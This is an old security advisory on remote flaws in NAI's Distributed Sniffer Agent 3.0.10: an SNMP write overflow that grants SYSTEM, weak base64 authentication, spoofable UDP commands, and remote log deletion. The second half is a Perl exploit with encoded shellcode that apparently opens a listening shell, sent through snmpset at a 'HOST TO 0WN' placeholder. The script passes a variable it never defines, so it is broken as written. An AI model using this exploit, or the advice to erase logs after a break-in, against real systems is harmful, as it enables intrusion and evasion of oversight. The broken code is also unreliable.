COMMAND

    Distributed Sniffer Agent

SYSTEMS AFFECTED

    NAI's Distributed Sniffer Agent

PROBLEM

    Kevin Start found following.  This 'advisory' details a number  of
    problems with NAI's sniffer product.  They have fixed the problems
    in current versions on the  sly so we have foregone  notifying the
    vendor.  They  saw fit to  post an advisory  on Microsoft's Netmon
    today so 'all is fair in love and war' at least MS had the dignity
    to announce their fixes.

    NAI's  Distributed  Sniffer  Agent  can  be overflowed remotely to
    grant SYSTEM privilege.   Additional vulnerabilities exist in  the
    management  protocol  to  allow  an  attacker  to  recover  logins
    passwords, take control of the agent, and delete logs.

    This has been  tested with Agent  version 3.0.10 using  Windows NT
    Workstation 4.0 SP6.

    1. The  most severe  problem was  an overflow  during SNMP writes.
       NAI  elected  to  use  a  single  community for both public and
       private access  simplifying the  process of  brute forcing  the
       community string.  Once this string has been guessed, shellcode
       can  be  written  into  any  accessible  object  (sysName,  for
       example).   The  buffer  is  256  bytes  long with no character
       restrictions as nulls  are allowed when  using hex mode  as the
       SNMP encoding.   This attack can  be launched completely  blind
       with one spoofed  UDP packet.   SYSTEM privilege can  be gained
       using this method.

    2.  Authentication  was  handled  using  base64 encoded logins and
       passwords.   Dsniff by  Dugsong already  includes a  module for
       capturing logins and passwords from the agent.  Base64 encoding
       was  also  used  to  obfuscate  changes  to  the  agent's  user
       database.

    3. All remote access  to the agent is  handled using UDP.   Once a
       user has  authenticated to  the agent,  an attacker  can inject
       his own  spoofed commands.   Full control  of the  agent can be
       gained in this manner.   If the packet generation facility  was
       enabled, a packet flood could be initiated.

    4. All data transferred from  the agent is in cleartext,  allowing
       an attacker to recover data  being sniffed on a remote  network
       segment.

    5. Flooding the agent with  false login requests can cause  system
       instability.  A kernel fault was caused during testing.

    6. Logs can  be deleted remotely,  allowing an attacker  to delete
       his own brute forcing attempts once he is successful.

    Exploit:

    #!/usr/bin/perl
    
    # exploit for NAI Sniffer Agent 3.0.10
    # Silently patched in later versions, although customers
    # were not notified.  No workaround was ever released.
    
    $xoredport="88 88 ";  # (4369) port XORed with 0x99
    
    $egg ="
    eb 07 90 aa 1c 9c 77 90 90 90 33 c0 50 f7 d0 50 59 f2
    af 59 b1 c6 8b c7 48 80 30 99 e2 fa 60 8d 85 70 fe
    ff ff 50 68 01 01 00 00 bb 77 be 6b 77 ff d3 61
    90 90 90 90 33 f6 96 bb 99 3c 60 47 c1 eb 08 56
    ff 13 8b d0 fc 33 c9 b1 0b 49 32 c0 ac 84 c0 75
    f9 52 51 56 52 b3 40 ff 13 ab 59 5a e2 ec 32 c0
    ac 84 c0 75 f9 b3 3c 56 ff 13 8b d0 fc 33 c9 b1
    06 32 c0 ac 84 c0 75 f9 52 51 56 52 b3 40 ff 13
    ab 59 5a e2 ec 83 c6 05 33 c0 50 40 50 40 50 ff 57 e8 93 6a 10 56 53
    ff 57 ec 6a 02 53 ff 57 f0 33 c0 57 50 b0 0c ab
    58 ab 40 ab 5f 48 50 57 56 ad 56 ff 57 c0 48 50
    57 ad 56 ad 56 ff 57 c0 48 b0 44 89 07 57 ff 57
    c4 33 c0 8b 46 f4 89 47 3c 89 47 40 8b 06 89 47
    38 33 c0 66 b8 01 01 89 47 2c 57 57 33 c0 50 50
    50 40 50 48 50 50 ad 56 33 c0 50 ff 57 c8 ff 76
    f0 ff 57 cc ff 76 fc ff 57 cc 48 50 50 53 ff 57
    f4 8b d8 33 c0 b4 04 50 c1 e8 04 50 ff 57 d4 8b
    f0 33 c0 8b c8 b5 04 50 50 57 51 50 ff 77 a8 ff
    57 d0 83 3f 01 7c 22 33 c0 50 57 ff 37 56 ff 77
    a8 ff 57 dc 0b c0 74 2f 33 c0 50 ff 37 56 53 ff
    57 f8 6a 50 ff 57 e0 eb c8 33 c0 50 b4 04 50 56
    53 ff 57 fc 57 33 c9 51 50 56 ff 77 ac ff 57 d8
    6a 50 ff 57 e0 eb aa 50 ff 57 e4 90 d2 dc cb d7
    dc d5 aa ab 99 da eb fc f8 ed fc c9 f0 e9 fc 99
    de fc ed ca ed f8 eb ed ec e9 d0 f7 ff f6 d8 99
    da eb fc f8 ed fc c9 eb f6 fa fc ea ea d8 99 da
    f5 f6 ea fc d1 f8 f7 fd f5 fc 99 c9 fc fc f2 d7
    f8 f4 fc fd c9 f0 e9 fc 99 de f5 f6 fb f8 f5 d8
    f5 f5 f6 fa 99 ce eb f0 ed fc df f0 f5 fc 99 cb
    fc f8 fd df f0 f5 fc 99 ca f5 fc fc e9 99 dc e1
    f0 ed c9 eb f6 fa fc ea ea 99 ce ca d6 da d2 aa
    ab 99 ea f6 fa f2 fc ed 99 fb f0 f7 fd 99 f5 f0
    ea ed fc f7 99 f8 fa fa fc e9 ed 99 ea fc f7 fd
    99 eb fc fa ef 99 9b 99  $xoredport 99 99 99 99
    99 99 99 99 99 99 99 99 fa f4 fd b7 fc e1 fc 99
    ff ff ff ff ";
    
    $offset = "00 c7 12 00 ";
    
    $snmpset = "/usr/bin/snmpset";
    $community = "public";
    $objid = "system.sysName.0";
    $offcount = 80;
    $nopcount = 200;
    
    @execstring = ("\" ", $offset x $offcount, "90 "x $nopcount, $egg,"
    \"");
    
    $host="HOST TO 0WN";
    
    exec ("$snmpset $host $community $objid x @sploitstring");

SOLUTION

    Fixed in current versions.